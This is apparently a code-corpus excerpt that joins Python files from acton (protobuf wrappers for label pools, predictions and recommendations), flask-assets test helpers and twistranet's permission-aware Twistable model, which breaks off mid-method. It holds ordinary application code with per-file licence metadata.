import acton.proto.acton_pb2 as acton_pb
import acton.proto.io
import google.protobuf.json_format as json_format
import numpy
import sklearn.preprocessing
from sklearn.preprocessing import LabelEncoder as SKLabelEncoder
def validate_db(db: acton_pb.Database):
"""Validates a Database proto.
Parameters
----------
db
Database to validate.
Raises
------
ValueError
"""
if db.class_name not in acton.database.DATABASES:
raise ValueError('Invalid database class name: {}'.format(
db.class_name))
if not db.path:
raise ValueError('Must specify db.path.')
def deserialise_encoder(
encoder: acton_pb.Database.LabelEncoder
) -> sklearn.preprocessing.LabelEncoder:
"""Deserialises a LabelEncoder protobuf.
Parameters
----------
encoder
LabelEncoder protobuf.
Returns
-------
sklearn.preprocessing.LabelEncoder
LabelEncoder carrying the deserialised class encodings (callers guard
against an empty encoding list before calling this).
"""
encodings = []
for encoding in encoder.encoding:
encodings.append((encoding.class_int, encoding.class_label))
encodings.sort()
encodings = numpy.array([c[1] for c in encodings])
encoder = SKLabelEncoder()
encoder.classes_ = encodings
return encoder
class LabelPool(object):
"""Wrapper for the LabelPool protobuf.
Attributes
----------
proto : acton_pb.LabelPool
Protobuf representing the label pool.
db_kwargs : dict
Key-value pairs of keyword arguments for the database constructor.
label_encoder : sklearn.preprocessing.LabelEncoder
Encodes labels as integers. May be None.
"""
def __init__(self, proto: Union[str, acton_pb.LabelPool]):
"""
Parameters
----------
proto
Path to .proto file, or raw protobuf itself.
"""
try:
self.proto = acton.proto.io.read_proto(proto, acton_pb.LabelPool)
except TypeError:
if isinstance(proto, acton_pb.LabelPool):
self.proto = proto
else:
raise TypeError('proto should be str or LabelPool protobuf.')
self._validate_proto()
self.db_kwargs = {kwa.key: json.loads(kwa.value)
for kwa in self.proto.db.kwarg}
if len(self.proto.db.label_encoder.encoding) > 0:
self.label_encoder = deserialise_encoder(
self.proto.db.label_encoder)
self.db_kwargs['label_encoder'] = self.label_encoder
else:
self.label_encoder = None
self._set_default()
@classmethod
def deserialise(cls, proto: bytes, json: bool=False) -> 'LabelPool':
"""Deserialises a protobuf into a LabelPool.
Parameters
----------
proto
Serialised protobuf.
json
Whether the serialised protobuf is in JSON format.
Returns
-------
LabelPool
"""
if not json:
lp = acton_pb.LabelPool()
lp.ParseFromString(proto)
return cls(lp)
return cls(json_format.Parse(proto, acton_pb.LabelPool()))
@property
def DB(self) -> acton.database.Database:
"""Gets a database context manager for the specified database.
Returns
-------
type
Database context manager.
"""
if hasattr(self, '_DB'):
return self._DB
self._DB = lambda: acton.database.DATABASES[self.proto.db.class_name](
self.proto.db.path, **self.db_kwargs)
return self._DB
@property
def ids(self) -> List[int]:
"""Gets a list of IDs.
Returns
-------
List[int]
List of known IDs.
"""
if hasattr(self, '_ids'):
return self._ids
self._ids = list(self.proto.id)
return self._ids
@property
def labels(self) -> numpy.ndarray:
"""Gets labels array specified in input.
Notes
-----
The returned array is cached by this object so future calls will not
need to recompile the array.
Returns
-------
numpy.ndarray
T x N x F NumPy array of labels.
"""
if hasattr(self, '_labels'):
return self._labels
ids = self.ids
with self.DB() as db:
self._labels = db.read_labels([0], ids)
return self._labels
def _validate_proto(self):
"""Checks that the protobuf is valid and enforces constraints.
Raises
------
ValueError
"""
validate_db(self.proto.db)
def _set_default(self):
"""Adds default parameters to the protobuf."""
@classmethod
def make(
cls: type,
ids: Iterable[int],
db: acton.database.Database) -> 'LabelPool':
"""Constructs a LabelPool.
Parameters
----------
ids
Iterable of instance IDs.
db
Database
Returns
-------
LabelPool
"""
proto = acton_pb.LabelPool()
# Store the IDs.
for id_ in ids:
proto.id.append(id_)
# Store the database.
proto.db.CopyFrom(db.to_proto())
return cls(proto)
class Predictions(object):
"""Wrapper for the Predictions protobuf.
Attributes
----------
proto : acton_pb.Predictions
Protobuf representing predictions.
db_kwargs : dict
Dictionary of database keyword arguments.
label_encoder : sklearn.preprocessing.LabelEncoder
Encodes labels as integers. May be None.
"""
def __init__(self, proto: Union[str, acton_pb.Predictions]):
"""
Parameters
----------
proto
Path to .proto file, or raw protobuf itself.
"""
try:
self.proto = acton.proto.io.read_proto(
proto, acton_pb.Predictions)
except TypeError:
if isinstance(proto, acton_pb.Predictions):
self.proto = proto
else:
raise TypeError('proto should be str or Predictions protobuf.')
self._validate_proto()
self.db_kwargs = {kwa.key: json.loads(kwa.value)
for kwa in self.proto.db.kwarg}
if len(self.proto.db.label_encoder.encoding) > 0:
self.label_encoder = deserialise_encoder(
self.proto.db.label_encoder)
self.db_kwargs['label_encoder'] = self.label_encoder
else:
self.label_encoder = None
self._set_default()
@property
def DB(self) -> acton.database.Database:
"""Gets a database context manager for the specified database.
Returns
-------
type
Database context manager.
"""
if hasattr(self, '_DB'):
return self._DB
self._DB = lambda: acton.database.DATABASES[self.proto.db.class_name](
self.proto.db.path, **self.db_kwargs)
return self._DB
@property
def predicted_ids(self) -> List[int]:
"""Gets a list of IDs corresponding to predictions.
Returns
-------
List[int]
List of IDs corresponding to predictions.
"""
if hasattr(self, '_predicted_ids'):
return self._predicted_ids
self._predicted_ids = [prediction.id
for prediction in self.proto.prediction]
return self._predicted_ids
@property
def labelled_ids(self) -> List[int]:
"""Gets a list of IDs the predictor knew the label for.
Returns
-------
List[int]
List of IDs the predictor knew the label for.
"""
if hasattr(self, '_labelled_ids'):
return self._labelled_ids
self._labelled_ids = list(self.proto.labelled_id)
return self._labelled_ids
@property
def predictions(self) -> numpy.ndarray:
"""Gets predictions array specified in input.
Notes
-----
The returned array is cached by this object so future calls will not
need to recompile the array.
Returns
-------
numpy.ndarray
T x N x D NumPy array of predictions.
"""
if hasattr(self, '_predictions'):
return self._predictions
self._predictions = []
for prediction in self.proto.prediction:
data = prediction.prediction
shape = (self.proto.n_predictors,
self.proto.n_prediction_dimensions)
self._predictions.append(
acton.proto.io.get_ndarray(data, shape, float))
self._predictions = numpy.array(self._predictions).transpose((1, 0, 2))
return self._predictions
def _validate_proto(self):
"""Checks that the protobuf is valid and enforces constraints.
Raises
------
ValueError
"""
if self.proto.n_predictors < 1:
raise ValueError('Number of predictors must be > 0.')
if self.proto.n_prediction_dimensions < 1:
raise ValueError('Prediction dimension must be > 0.')
validate_db(self.proto.db)
def _set_default(self):
"""Adds default parameters to the protobuf."""
@classmethod
def make(
cls: type,
predicted_ids: Iterable[int],
labelled_ids: Iterable[int],
predictions: numpy.ndarray,
db: acton.database.Database,
predictor: str='') -> 'Predictions':
"""Converts NumPy predictions to a Predictions object.
Parameters
----------
predicted_ids
Iterable of instance IDs corresponding to predictions.
labelled_ids
Iterable of instance IDs used to train the predictor.
predictions
T x N x D array of corresponding predictions.
predictor
Name of predictor used to generate predictions.
db
Database.
Returns
-------
Predictions
"""
proto = acton_pb.Predictions()
# Store single data first.
n_predictors, n_instances, n_prediction_dimensions = predictions.shape
proto.n_predictors = n_predictors
proto.n_prediction_dimensions = n_prediction_dimensions
proto.predictor = predictor
# Store the database.
proto.db.CopyFrom(db.to_proto())
# Store the predictions array. We can do this by looping over the
# instances.
for id_, prediction in zip(
predicted_ids, predictions.transpose((1, 0, 2))):
prediction_ = proto.prediction.add()
prediction_.id = int(id_) # numpy.int64 -> int
prediction_.prediction.extend(prediction.ravel())
# Store the labelled IDs.
for id_ in labelled_ids:
# int() here takes numpy.int64 to int, for protobuf compatibility.
proto.labelled_id.append(int(id_))
return cls(proto)
@classmethod
def deserialise(cls, proto: bytes, json: bool=False) -> 'Predictions':
"""Deserialises a protobuf into Predictions.
Parameters
----------
proto
Serialised protobuf.
json
Whether the serialised protobuf is in JSON format.
Returns
-------
Predictions
"""
if not json:
predictions = acton_pb.Predictions()
predictions.ParseFromString(proto)
return cls(predictions)
return cls(json_format.Parse(proto, acton_pb.Predictions()))
class Recommendations(object):
"""Wrapper for the Recommendations protobuf.
Attributes
----------
proto : acton_pb.Recommendations
Protobuf representing recommendations.
db_kwargs : dict
Key-value pairs of keyword arguments for the database constructor.
label_encoder : sklearn.preprocessing.LabelEncoder
Encodes labels as integers. May be None.
"""
def __init__(self, proto: Union[str, acton_pb.Recommendations]):
"""
Parameters
----------
proto
Path to .proto file, or raw protobuf itself.
"""
try:
self.proto = acton.proto.io.read_proto(
proto, acton_pb.Recommendations)
except TypeError:
if isinstance(proto, acton_pb.Recommendations):
self.proto = proto
else:
raise TypeError(
'proto should be str or Recommendations protobuf.')
self._validate_proto()
self.db_kwargs = {kwa.key: json.loads(kwa.value)
for kwa in self.proto.db.kwarg}
if len(self.proto.db.label_encoder.encoding) > 0:
self.label_encoder = deserialise_encoder(
self.proto.db.label_encoder)
self.db_kwargs['label_encoder'] = self.label_encoder
else:
self.label_encoder = None
self._set_default()
@classmethod
def deserialise(cls, proto: bytes, json: bool=False) -> 'Recommendations':
"""Deserialises a protobuf into Recommendations.
Parameters
----------
proto
Serialised protobuf.
json
Whether the serialised protobuf is in JSON format.
Returns
-------
Recommendations
"""
if not json:
recommendations = acton_pb.Recommendations()
recommendations.ParseFromString(proto)
return cls(recommendations)
return cls(json_format.Parse(proto, acton_pb.Recommendations()))
@property
def DB(self) -> acton.database.Database:
"""Gets a database context manager for the specified database.
Returns
-------
type
Database context manager.
"""
if hasattr(self, '_DB'):
return self._DB
self._DB = lambda: acton.database.DATABASES[self.proto.db.class_name](
self.proto.db.path, **self.db_kwargs)
return self._DB
@property
def recommendations(self) -> List[int]:
"""Gets a list of recommended IDs.
Returns
-------
List[int]
List of recommended IDs.
"""
if hasattr(self, '_recommendations'):
return self._recommendations
self._recommendations = list(self.proto.recommended_id)
return self._recommendations
@property
def labelled_ids(self) -> List[int]:
"""Gets a list of labelled IDs.
Returns
-------
List[int]
List of labelled IDs.
"""
if hasattr(self, '_labelled_ids'):
return self._labelled_ids
self._labelled_ids = list(self.proto.labelled_id)
return self._labelled_ids
def _validate_proto(self):
"""Checks that the protobuf is valid and enforces constraints.
Raises
------
ValueError
"""
validate_db(self.proto.db)
def _set_default(self):
"""Adds default parameters to the protobuf."""
@classmethod
def make(
cls: type,
recommended_ids: Iterable[int],
labelled_ids: Iterable[int],
recommender: str,
db: acton.database.Database) -> 'Recommendations':
"""Constructs a Recommendations.
Parameters
----------
recommended_ids
Iterable of recommended instance IDs.
labelled_ids
Iterable of labelled instance IDs used to make recommendations.
recommender
Name of the recommender used to make recommendations.
db
Database.
Returns
-------
Recommendations
"""
proto = acton_pb.Recommendations()
# Store single data first.
proto.recommender = recommender
# Store the IDs.
for id_ in recommended_ids:
proto.recommended_id.append(id_)
for id_ in labelled_ids:
proto.labelled_id.append(id_)
# Store the database.
proto.db.CopyFrom(db.to_proto())
return cls(proto)
| bsd-3-clause | -1,972,909,586,038,859,800 | 27.202401 | 79 | 0.562827 | false |
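A hedged round-trip sketch for the `Predictions` wrapper above: build one from raw NumPy output, serialise it, and deserialise it again. A concrete `acton.database.Database` is required by `make`, so `db` below is a placeholder and the snippet is not runnable without one:

```python
import numpy
from acton.proto.wrappers import Predictions

# T x N x D convention: 2 predictors, 3 instances, 1 dimension.
raw = numpy.random.random((2, 3, 1))

preds = Predictions.make(
    predicted_ids=[10, 11, 12],
    labelled_ids=[1, 2],
    predictions=raw,
    db=db,  # placeholder: a concrete, open acton.database.Database
    predictor='LogisticRegression')

wire = preds.proto.SerializeToString()
restored = Predictions.deserialise(wire)
assert restored.predictions.shape == (2, 3, 1)
```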
miracle2k/flask-assets | tests/helpers.py | 1 | 1105 | from flask.app import Flask
from webassets.test import TempEnvironmentHelper as BaseTempEnvironmentHelper
from flask_assets import Environment
try:
from flask import Blueprint
Module = None
except ImportError:
# Blueprints only available starting with 0.7,
# fall back to old Modules otherwise.
Blueprint = None
from flask import Module
__all__ = ('TempEnvironmentHelper', 'Module', 'Blueprint')
class TempEnvironmentHelper(BaseTempEnvironmentHelper):
def _create_environment(self, **kwargs):
if not hasattr(self, 'app'):
self.app = Flask(__name__, static_folder=self.tempdir, **kwargs)
self.env = Environment(self.app)
return self.env
try:
from test.test_support import check_warnings
except ImportError:
# Python < 2.6
import contextlib
@contextlib.contextmanager
def check_warnings(*filters, **kwargs):
# We cannot reasonably support this, we'd have to copy to much code.
# (or write our own). Since this is only testing warnings output,
# we might slide by ignoring it.
yield
| bsd-2-clause | 1,334,822,051,698,322,400 | 28.078947 | 77 | 0.694118 | false |
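A hedged sketch of a test built on the helper above; `setup()`, `create_files()`, `mkbundle()` and `get()` are assumed to be inherited from webassets' base `TempEnvironmentHelper`:

```python
from tests.helpers import TempEnvironmentHelper

class TestSimpleBuild(TempEnvironmentHelper):
    def test_build(self):
        self.setup()  # creates the temp dir, Flask app and Environment
        self.create_files({'in.js': 'var a = 1;'})
        bundle = self.mkbundle('in.js', output='out.js')
        bundle.build()
        assert self.get('out.js')  # output file was written
```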
numericube/twistranet | twistranet/twistapp/models/twistable.py | 1 | 31887 | """
Base of the securable (ie. directly accessible through the web), translatable and full-featured TN object.
A twist-able object in TN is an object which can be accessed safely from a view.
Normally, everything a view manipulates must be taken from a TN object.
Content, Accounts, MenuItems, ... are all Twistable objects.
This abstract class provides a lot of little tricks to handle view/model articulation,
such as slug management, groundwork for translation management, and so on.
"""
import re
import inspect
import logging
import traceback
from django.db import models
from django.db.models import Q, loading
from django.db.utils import DatabaseError
from django.contrib.auth.models import User
from django.core.exceptions import ValidationError, PermissionDenied, ObjectDoesNotExist
from django.utils.safestring import mark_safe
from twistranet.twistapp.lib.log import log
from twistranet.twistapp.lib import roles, permissions
from twistranet.twistapp.lib.slugify import slugify
from twistranet.twistapp.signals import twistable_post_save
from fields import ResourceField, PermissionField, TwistableSlugField
class TwistableManager(models.Manager):
"""
It's the base of the security model!!
"""
# Disabled for performance reasons.
# use_for_related_fields = True
def get_query_set(self, __account__ = None, request = None, ):
"""
Return a queryset of 100%-authorized objects. All (should) have the can_list perm to True.
This is in fact a kind of 'has_permission(can_list)' method!
This method IS very slow, but you can speed things up by passing either 'request' or '__account__' along.
Be aware, however, that in this case you lose the 'safety belt' provided by the security model.
"""
# Check for anonymous query
import community, account, community
__account__ = self._getAuthenticatedAccount(__account__, request)
base_query_set = super(TwistableManager, self).get_query_set()
# System account: return all objects without asking any question. And with all permissions set.
if __account__.id == account.SystemAccount.SYSTEMACCOUNT_ID:
return base_query_set
# XXX TODO: Make a special query for admin members? Or at least mgrs of the global community?
# XXX Make this more efficient?
# XXX Or, better, check if current user is manager of the owner ?
if __account__.id > 0:
managed_accounts = [__account__.id, ]
else:
managed_accounts = []
# XXX This try/except is there so that things don't get stucked during boostrap
try:
if __account__.is_admin:
return base_query_set.filter(
_p_can_list__lte = roles.manager,
)
except DatabaseError:
log.warning("DB error while checking AdminCommunity. This is NORMAL during syncdb or bootstrap.")
return base_query_set
# Regular check. Works for anonymous as well...
# network_ids = __account__.network_ids
if not __account__.is_anonymous:
qs = base_query_set.filter(
Q(
owner__id = __account__.id,
_p_can_list = roles.owner,
) | Q(
_access_network__targeted_network__target = __account__,
_p_can_list = roles.network,
) | Q(
_access_network__targeted_network__target = __account__,
_p_can_list = roles.public,
) | Q(
# Anonymous stuff
_access_network__isnull = True,
_p_can_list = roles.public,
)
)
else:
# Anon query. Easy: We just return public stuff.
# Warning: nested query is surely inefficient...
free_access_network = Twistable.objects.__booster__.filter(
_access_network__isnull = True,
_p_can_list = roles.public,
)
qs = base_query_set.filter(
Q(
# Strictly anonymous stuff
_access_network__isnull = True,
_p_can_list = roles.public,
) | Q(
# Incidently anonymous stuff (public stuff published by an anon account)
_access_network__isnull = False,
_access_network__id__in = free_access_network,
_p_can_list = roles.public,
)
)
return qs
def getCurrentAccount(self, request):
"""
The official and hassle-free method of getting the currently auth account from a view.
Just pass the request object.
"""
from account import Account, AnonymousAccount, UserAccount
u = getattr(request, 'user', None)
if isinstance(u, User):
# We use this instead of the get_profile() method to avoid an infinite recursion here.
# We mimic the _profile_cache behavior of django/contrib/auth/models.py to avoid doing a lot of requests on the same object
if not hasattr(u, '_account_cache'):
u._account_cache = UserAccount.objects.__booster__.get(user__id__exact = u.id)
u._account_cache.user = u
return u._account_cache
# Didn't find anything. We must be anonymous.
return AnonymousAccount()
def _getAuthenticatedAccount(self, __account__ = None, request = None):
"""
Dig the stack to find the authenticated account object.
Return either a (possibly generic) account object or None.
Views with a "request" parameter magically works with that.
If you want to use a system account, declare a '__account__' variable in your caller function.
"""
from account import Account, AnonymousAccount, UserAccount
# If we have the __account__ object, then it's quite obvious here...
if isinstance(__account__, Account):
return __account__
# If we have the request object, then we just can use getCurrentAccount() instead
if request:
return self.getCurrentAccount(request)
# We dig into the stack frame to find the request object.
frame = inspect.currentframe()
try:
while frame:
frame_members = dict(inspect.getmembers(frame))
# Inspect 'locals' variables to get the request or __account__
_locals = frame_members.get('f_locals', None)
if _locals:
# Check for an __acount__ variable holding a generic Account object. It always has precedence over 'request'
if _locals.has_key('__account__') and isinstance(_locals['__account__'], Account):
return _locals['__account__']
# Check for a request.user User object
if _locals.has_key('request'):
u = getattr(_locals['request'], 'user', None)
if isinstance(u, User):
# We use this instead of the get_profile() method to avoid an infinite recursion here.
# We mimic the _profile_cache behavior of django/contrib/auth/models.py to avoid doing a lot of requests on the same object
if not hasattr(u, '_account_cache'):
u._account_cache = UserAccount.objects.__booster__.get(user__id__exact = u.id)
u._account_cache.user = u
return u._account_cache
# Get back to the upper frame
frame = frame_members.get('f_back', None)
# Didn't find anything. We must be anonymous.
return AnonymousAccount()
finally:
# Avoid circular refs between the frames and their locals
frame = None
_locals = None
# Backdoor for performance purposes. Use it at your own risk as it breaks security.
@property
def __booster__(self):
return super(TwistableManager, self).get_query_set()
@property
def can_create(self,):
auth = self._getAuthenticatedAccount()
return not auth.is_anonymous
class _AbstractTwistable(models.Model):
"""
We use this abstract class to enforce use of our manager in all our subclasses.
"""
objects = TwistableManager()
class Meta:
abstract = True
class Twistable(_AbstractTwistable):
"""
Base (abstract) type for rich, inheritable and securable TN objects.
This class is quite optimal when using its base methods but you should always use
your dereferenced class when you can do so!
All Content and Account classes derive from this.
XXX TODO: Securise the base manager!
"""
# Object management. Slug is optional (id is not ;))
slug = TwistableSlugField(unique = True, db_index = True, null = True, blank = True)
# This is a way to de-reference the underlying model rapidly
app_label = models.CharField(max_length = 64, db_index = True)
model_name = models.CharField(max_length = 64, db_index = True)
# Text representation of this content
# Usually a twistable is represented that way:
# (pict) TITLE
# Description [Read more]
# Basic metadata shared by all Twist objects.
# Title is mandatory!
title = models.CharField(max_length = 255, blank = True, default = '')
description = models.TextField(max_length = 1024, blank = True, default = '')
created_at = models.DateTimeField(auto_now_add = True, null = True, db_index = False)
modified_at = models.DateTimeField(auto_now = True, null = True, db_index = True)
created_by = models.ForeignKey("Account", related_name = "created_twistables", db_index = True, )
modified_by = models.ForeignKey("Account", null = True, related_name = "modified_twistables", db_index = True, )
# Picture management.
# If None, will use the default_picture_resource_slug attribute.
# If you want to get the account picture, use the 'picture' attribute.
default_picture_resource_slug = None
# XXX TODO PJ : the widget params are never rendered
picture = ResourceField( media_type='image', null = True, blank = True, related_name = "picture_of")
tags = models.ManyToManyField("Tag", related_name = "tagged")
# These are two security flags.
# The account this content is published for. 'NULL' means visible to AnonymousAccount.
publisher = models.ForeignKey("Account", null = True, blank = True, related_name = "published_twistables", db_index = True, )
# Security / Role shortcuts. These are the ppl/account the Owner / Network are given to.
# The account this object belongs to (ie. the actual author)
owner = models.ForeignKey("Account", related_name = "by", db_index = True, )
# Our security model.
permission_templates = () # Define this in your subclasses
permissions = PermissionField(db_index = True)
_access_network = models.ForeignKey("Account", null = True, blank = True, related_name = "+", db_index = True, )
# Scoring information. This is stored directly on the object for performance reasons.
# Should be updated by BATCH, not necessarily 'live' (for perf reasons as well).
static_score = models.IntegerField(default = 0)
# The permissions. It's strongly forbidden to edit those roles by hand, use the 'permissions' property instead.
_p_can_view = models.IntegerField(default = 16, db_index = True)
_p_can_edit = models.IntegerField(default = 16, db_index = True)
_p_can_list = models.IntegerField(default = 16, db_index = True)
_p_can_list_members = models.IntegerField(default = 16, db_index = True)
_p_can_publish = models.IntegerField(default = 16, db_index = True)
_p_can_join = models.IntegerField(default = 16, db_index = True)
_p_can_leave = models.IntegerField(default = 16, db_index = True)
_p_can_create = models.IntegerField(default = 16, db_index = True)
# Other configuration stuff (class-wise)
_ALLOW_NO_PUBLISHER = False # Prohibit creation of an object of this class with publisher = None.
_FORCE_SLUG_CREATION = True # Force creation of a slug if it doesn't exist
@property
def kind(self):
"""
Return the kind of object it is (as a lower-cased string).
"""
from twistranet.twistapp.models import Content, Account, Community, Resource
from twistranet.tagging.models import Tag
mc = self.model_class
if issubclass(mc, Content):
return 'content'
elif issubclass(mc, Community):
return 'community'
elif issubclass(mc, Account):
return 'account'
elif issubclass(mc, Resource):
return 'resource'
elif issubclass(mc, Tag):
return 'tag'
raise NotImplementedError("Can't get twistable category for object %s" % self)
@models.permalink
def get_absolute_url(self):
"""
return object absolute_url
"""
category = self.kind
viewbyslug = '%s_by_slug' % category
viewbyid = '%s_by_id' % category
if hasattr(self, 'slug'):
if self.slug:
return (viewbyslug, [self.slug])
return (viewbyid, [self.id])
@property
def html_link(self,):
"""
Return a pretty HTML anchor tag
"""
d = {
'label': self.title_or_description,
'url': self.get_absolute_url(),
}
return u"""<a href="%(url)s" title="%(label)s">%(label)s</a>""" % d
@property
def forced_picture(self,):
"""
Return actual picture for this content or default picture if not available.
May return None!
XXX SHOULD CACHE THIS
"""
import resource
if issubclass(self.model_class, resource.Resource):
return self.object
try:
picture = self.picture
if picture is None:
raise resource.Resource.DoesNotExist()
except resource.Resource.DoesNotExist:
try:
picture = resource.Resource.objects.get(slug = self.model_class.default_picture_resource_slug)
except resource.Resource.DoesNotExist:
return None
return picture
def get_thumbnail(self, *args, **kw):
"""
Same arguments as sorl's get_thumbnail method.
"""
from sorl.thumbnail import default
try:
return default.backend.get_thumbnail(self.forced_picture.image, *args, **kw)
except:
# in rare situations (CMJK + PNG mode, sorl thumbnail raise an error)
import resource
picture = resource.Resource.objects.get(slug = self.model_class.default_picture_resource_slug)
return default.backend.get_thumbnail(picture.image, *args, **kw)
@property
def thumbnails(self,):
"""
Return a dict of standard thumbnails methods.
XXX TODO: Cache this! And use lazy resolution!
Some day resources will be able to have several DIFFERENT previews...
Preview: Max = 500x500; Used when a large version should be available.
Summary: Max = 100x100;
Summary Preview: Max = Min = 100x100;
Medium: Max = Min = 50x50;
Icon: Max = Min = 16x16;
"""
return {
"preview": self.get_thumbnail("500x500", crop = "", upscale = False),
"summary": self.get_thumbnail("100x100", crop = "", upscale = False),
"summary_preview": self.get_thumbnail("100x100", crop = "center top", upscale = True),
"medium": self.get_thumbnail("50x50", crop = "center top", upscale = True),
"big_icon": self.get_thumbnail("32x32", upscale = False),
"icon": self.get_thumbnail("16x16", crop = "center top", upscale = True),
}
# #
# Internal management, ensuring DB consistency #
# #
def save(self, *args, **kw):
"""
Set various object attributes
"""
import account
import community
auth = Twistable.objects._getAuthenticatedAccount()
# Check if we're saving a real object and not a generic Content one (which is prohibited).
# This must be a programming error, then.
if self.__class__.__name__ == Twistable.__name__:
raise ValidationError("You cannot save a raw content object. Use a derived class instead.")
        # Set information used to retrieve the actual subobject
self.model_name = self._meta.object_name
self.app_label = self._meta.app_label
# Set owner, publisher upon object creation. Publisher is NEVER set as None by default.
if self.id is None:
# If self.owner is already set, ensure it's done by SystemAccount
if self.owner_id:
if not isinstance(auth, account.SystemAccount):
raise PermissionDenied("You're not allowed to set the content owner by yourself.")
else:
self.owner = self.getDefaultOwner()
if not self.publisher_id:
self.publisher = self.getDefaultPublisher()
else:
if not self.publisher.can_publish:
raise PermissionDenied("You're not allowed to publish on %s" % self.publisher)
else:
# XXX TODO: Check that nobody sets /unsets the owner or the publisher of an object
# raise PermissionDenied("You're not allowed to set the content owner by yourself.")
if not self.can_edit:
raise PermissionDenied("You're not allowed to edit this content.")
# Set created_by and modified_by fields
if self.id is None:
self.created_by = auth
self.modified_by = auth
        # Check if publisher is set. Only GlobalCommunity may have its publisher set to None to make a site visible on the internet.
if not self.publisher_id:
if not self.__class__._ALLOW_NO_PUBLISHER:
raise ValueError("Only the Global Community can have no publisher, not %s" % self)
# Set permissions; we will apply them last to ensure we have an id.
# We also ensure that the right permissions are set on the right object
if not self.permissions:
perm_template = self.model_class.permission_templates
if not perm_template:
raise ValueError("permission_templates not defined on class %s" % self.__class__.__name__)
self.permissions = perm_template.get_default()
tpl = [ t for t in self.permission_templates.permissions() if t["id"] == self.permissions ]
if not tpl:
# Didn't find? We restore default setting. XXX Should log/alert something here!
tpl = [ t for t in self.permission_templates.permissions() if t["id"] == self.model_class.permission_templates.get_default() ]
log.warning("Restoring default permissions. Problem here.")
log.warning("Unable to find %s permission template %s in %s" % (self, self.permissions, self.permission_templates.perm_dict))
if tpl[0].get("disabled_for_community") and issubclass(self.publisher.model_class, community.Community):
raise ValueError("Invalid permission setting %s for this object (%s/%s)" % (tpl, self, self.title_or_description))
elif tpl[0].get("disabled_for_useraccount") and issubclass(self.publisher.model_class, account.UserAccount):
raise ValueError("Invalid permission setting %s for this object (%s/%s)" % (tpl, self, self.title_or_description))
for perm, role in tpl[0].items():
if perm.startswith("can_"):
if callable(role):
role = role(self)
setattr(self, "_p_%s" % perm, role)
# Check if we're creating or not
created = not self.id
# Generate slug (or not !)
if not self.slug and self.__class__._FORCE_SLUG_CREATION:
if self.title:
self.slug = slugify(self.title)
elif self.description:
self.slug = slugify(self.description)
else:
self.slug = slugify(self.model_name)
self.slug = self.slug[:40]
if created and self.__class__._FORCE_SLUG_CREATION:
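            # Slug collision? Append or increment a numeric suffix (_1, _2, ...)
            # until the slug is unique.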
while Twistable.objects.__booster__.filter(slug = self.slug).exists():
match = re.search("_(?P<num>[0-9]+)$", self.slug)
if match:
root = self.slug[:match.start()]
num = int(match.groupdict()['num']) + 1
else:
root = self.slug
num = 1
self.slug = "%s_%i" % (root, num, )
# Perform a full_clean on the model just to be sure it validates correctly
self.full_clean()
# Save and update access network information
ret = super(Twistable, self).save(*args, **kw)
self._update_access_network()
# Send TN's post-save signal
twistable_post_save.send(sender = self.__class__, instance = self, created = created)
return ret
def _update_access_network(self, ):
"""
        Update hierarchy of driven objects.
"""
# No id => this twistable doesn't control anything, we pass. Value will be set AFTER saving.
import account, community
if not self.id:
raise ValueError("Can't set _access_network before saving the object.")
# Update current object. We save current access and determine the more restrictive _p_can_list access permission.
# Remember that a published content has its permissions determined by its publisher's can_VIEW permission!
_current_access_network = self._access_network
obj = self.object
if issubclass(obj.model_class, account.Account):
_p_can_list = self._p_can_list
else:
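            # Role values are ordered integers, so max() keeps the more restrictive
            # of the object's own can_list and its publisher's can_view permission.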
_p_can_list = max(self._p_can_list, self.publisher and self.publisher._p_can_view or roles.public)
        # If restricted to the content owner, no access network is mentioned here.
if _p_can_list in (roles.owner, ):
self._access_network = None # XXX We have to double check this, esp. on the GlobalCommunity object.
# Network role: same as current network for an account, same as publisher's network for a content
elif _p_can_list == roles.network:
if issubclass(obj.model_class, account.Account):
self._access_network = obj
else:
self._access_network = self.publisher
# Public content (or so it seems)
elif _p_can_list == roles.public:
# GlobalCommunity special case: if can_list goes public, then we can unrestrict the _access_network
if issubclass(self.model_class, community.GlobalCommunity):
self._access_network = None # Let's go public!
else:
# Regular treatment
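                # Walk up the publisher chain; the first non-public ancestor
                # (owner- or network-restricted) becomes this object's access network.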
obj = obj.publisher
while obj:
if obj._p_can_list == roles.public:
if obj == obj.publisher:
# If an object is its own publisher (eg. GlobalCommunity),
# we avoid infinite recursions here.
break
obj = obj.publisher
elif obj._p_can_list in (roles.owner, roles.network, ):
self._access_network = obj
break
else:
raise ValueError("Unexpected can_list role found: %d on object %s" % (obj._p_can_list, obj))
else:
raise ValueError("Unexpected can_list role found: %d on object %s" % (obj._p_can_list, obj))
# Update this object itself without calling the save() method again
Twistable.objects.__booster__.filter(id = self.id).update(_access_network = self._access_network)
        # Update dependent objects if current object's network changed for public role
Twistable.objects.__booster__.filter(
Q(_access_network__id = self.id) | Q(publisher = self.id),
_p_can_list = roles.public,
).exclude(id = self.id).update(_access_network = obj)
# This is an additional check to ensure that no _access_network = None object with _p_can_list|_p_can_view = public still remains
# glob = community.GlobalCommunity.get()
# Twistable.objects.__booster__.filter(
# _access_network__isnull = True,
# _p_can_list = roles.public
# ).update(_access_network = glob)
def delete(self,):
"""
Here we avoid deleting related object for nullabled ForeignKeys.
XXX This is bad 'cause if we use the Manager.delete() method, this won't get checked!!!
XXX We need to migrate to Django 1.3 ASAP to get this issue solved with the on_delete attribute.
Hack from http://djangosnippets.org/snippets/1231/
"""
self.clear_nullable_related()
super(Twistable, self).delete()
def clear_nullable_related(self):
"""
Recursively clears any nullable foreign key fields on related objects.
Django is hard-wired for cascading deletes, which is very dangerous for
us. This simulates ON DELETE SET NULL behavior manually.
"""
# Update picture__id
Twistable.objects.__booster__.filter(picture__id = self.id).update(
picture = None
)
@property
def model_class(self):
"""
Return the actual model's class.
This method issues no DB query.
"""
return loading.get_model(self.app_label, self.model_name)
@property
def object(self):
"""
Return the exact subclass this object belongs to.
IT MAY ISSUE DB QUERY, so you should always consider using model_class instead if you can.
        This is quite complex actually: since we want to minimize database overhead,
we can't allow a "Model.objects.get(id = x)" call.
So, instead, we walk through object inheritance to fetch the right attributes.
XXX TODO: This is where I can implement the can_view or can_list filter. See search results to understand why.
"""
if self.id is None:
raise RuntimeError("You can't get subclass until your object is saved in database.")
# Get model class directly
model = loading.get_model(self.app_label, self.model_name)
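        # If self is already an instance of the concrete model, no DB query is needed.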
if isinstance(self, model):
return self
return model.objects.__booster__.get(id = self.id)
def __unicode__(self,):
"""
Return model_name: id (slug)
"""
if not self.app_label or not self.model_name:
return "Unsaved %s" % self.__class__
if not self.id:
return "Unsaved %s.%s" % (self.app_label, self.model_name, )
if self.slug:
